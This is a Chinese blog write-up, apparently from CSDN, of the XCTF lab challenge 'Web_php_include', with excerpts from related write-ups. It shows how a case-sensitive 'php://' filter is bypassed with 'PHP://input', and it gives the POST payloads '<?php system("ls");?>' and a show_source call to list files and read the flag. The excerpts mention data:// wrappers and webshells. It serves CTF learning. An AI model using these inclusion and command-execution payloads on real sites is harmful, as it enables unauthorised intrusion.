xctf_Web_php_include

最新推荐文章于 2024-12-26 00:08:33 发布
原创 最新推荐文章于 2024-12-26 00:08:33 发布 · 488 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种在Windows环境下,通过PHP命令注入绕过安全限制的方法,利用大小写替换绕过php://input的过滤,进而执行系统命令,查找并显示特定文件内容,最终获取flag。

[目标]
Php命令查询
[环境]
Windows
[工具]
浏览器
[分析]
1.阅读页面php代码
在这里插入图片描述

strstr(str1,str2)函数用于判断字符串str2是否是str1的子串,如果是的话,用空字符代替php://,因此php://被过滤。因此我们可以利用大小写替换去绕过
此处说到的是php的输入流:php://input可以读取没有处理过的post的数据
为了绕过,需大写,命令如下:

PHP://input

在这里插入图片描述

2.绕过之后,需要输入php命令去寻找flag所在文件,因此查找文件列表
命令:<?php system(“ls”);?>
在这里插入图片描述

3.文件列表如上图所示,只需要查看第一个文件即可
命令:<?show_source(“fl4gisisish3r3.php”);?>
在这里插入图片描述

得到flag

XCTF-WEB-Web_php_include
Lorezon的博客
03-15 775
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
7.XCTF Web_php_include
山兔的博客
09-16 319
一打开网站,就看到了下面这串代码 <?php show_source(__FILE__); //查看文件 echo $_GET['hello']; //输出hello获取到的数据 $page=$_GET['page']; //变量page由参数page来决定 while (strstr($page, "php://")) { //当变量中有php://时, $page=str_replace("ph
由题目XCTF Web_php_include 复习包含漏洞
jelly
07-05 1125
题目url:http://220.249.52.133:47390 代码分析 题目一来就是一段代码,分析一下 show_source() 函数对文件进行语法高亮显示 hello用get方式接收参数直接输出 page参数也是通过get方式接收,strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串,但是区分大小写,如果不区分大小写使用stristr()函数。这里的意思是如果page参数中包含"php://",就替换为空。 通过过滤后包含page参数传来的文件。 .
Web_php_include-xctf
qq_43660551的博客
07-03 1087
RCE-PHP
攻防世界XCTFWeb_php_include
末初 · mochu7
03-13 1051
这里需要绕过strstr()函数查找字符,使用php伪协议,不然会被替换为空。 针对strstr()函数对大小写敏感,绕过使用php://input流 也就是说,如果使用php://input 我们传入的数据就能相当于以post包的形式,传入php变量执行。 Cat fl4gisisish3r3.php查看内容 ...
xctf web_php_include
最新发布
03-29
好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接...
攻防世界 - Web - Level 1 file_include
m0_74824687的博客
12-26 874
本题考察的是 PHP 的文件包含漏洞,一般 CTF 的文件包含漏洞考点都是 PHP 伪协议。文件中的,当然不乏改名的。我们在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫,但笔者觉得没必要)。首先请求上面的 Payload 模板,并使用 BurpSuite 进行抓包,然后将 PHP 支持的字符编码作为参数替换。估计是对用户传入值进行一个检查的文件,然后就是直接进行文件包含了。的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对。下面我们就是尝试进行文件包含,直接包含。
XCTFWeb_php_include
小白渣的博客
10-29 6117
首先打开题目看到一串源码,对它进行审计 得到一个变量page 百度了一下strstr函数发现它对大小写十分敏感,所以我们可以用大写来进行绕过,这里简单普及一下这个函数的用法, strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串;否则,返回NULL。 ...
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3820
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
XCTF web Web_php_include (php://过滤)
H4ppyD0g的博客
08-28 426
题目代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 用php://来引入文件流,然后include显示文件信息 php://被过滤,但是有个hello 因为这个页面就是默认页面,而且默认页面也可以用i
Web_php_include 和supersqli攻防世界xctf web
weixin_45689999的博客
03-03 652
Web_php_include 代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);//相当于过滤了php:// } include($page...
XCTF WEB simple_php
无限迭代中......
07-01 3249
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072 题解: 掌握php弱类型比较 php中有两种比较符号: ==: 先将字符串类型转化成相同,再比较 ===: 先将字符串类型转化成相同,再比较 字符串和数字比较使用==时,字符串会先转换为数字类型再比较php var...
攻防世界 Web_php_include write up
weixin_30872157的博客
09-19 1108
攻防世界 Web_php_include write updirbuster 扫目录 发现phpinfo()可以看到绝对路径 和 phpmyadmin进入phpmyadmin页面 root直接空密码登录查看phpmyadmin变量 secure file priv 值为空 说明可以写入一句话load_file()可以读取任意文件.......在经过各种尝试写人一...
xctfphp2
小白渣的博客
10-21 738
第一次看到就想到用菜刀或者蚁剑连上看看,能不能直接控制,去后台找找看有无flag 结果都失败了,于是就访问了index.php,看看有啥,结果也没什么东西,于是用御剑扫扫看后台,也扫不出来啥东西 于是在php后面加上了s,看看能不能直接读取源码,结果源码直接出来了。 于是分析了一下源码要二次url编码,在网上找了一下a的url的编码表,知道了a的url编码为%61,于是对%进行了二次编码,得到了...
XCTF-高手进阶区:Web_php_include
1stPeak's Blog
03-02 649
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 看源码,可能是不想让我们使用php://in...
[wp] 攻防世界 Web_php_include
MercyLin的博客
09-28 6941
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr是对大小写敏感的,用大写PHP绕过...
xctf 攻防世界web2
freerats的博客
10-25 527
打开题目,出现一段加密代码 题目思路比较简单,逆向加密算法,也告诉了加密后的结果,一步步解密回去就行 $miwen=“a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws” rot13得:n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gjf 就然后查了一下str...
xctf攻防世界web新手练习区--write up
热门推荐
qq_43081170的博客
07-05 3万+
** 文章目录 ** view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 打开题目后显示FLAG is not here,而且题目描述提示鼠标右键不管用了。这时想到F12键打开开发者工具,查看器可以查看页面源代码。F12----查看器直接得到答案。 get post **题目描述:**X老师告诉小宁同学HTTP通常使用两种请求方法,你...
攻防世界之php_rce、Web_php_include
qq_42728977的博客
01-19 3147
Web_php_unserialize php_rce web_php_include 1、漏洞点:php strstr() 绕过,伪协议包含漏洞 这个提有很多利用方法。 方法一: 访问页面看到如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值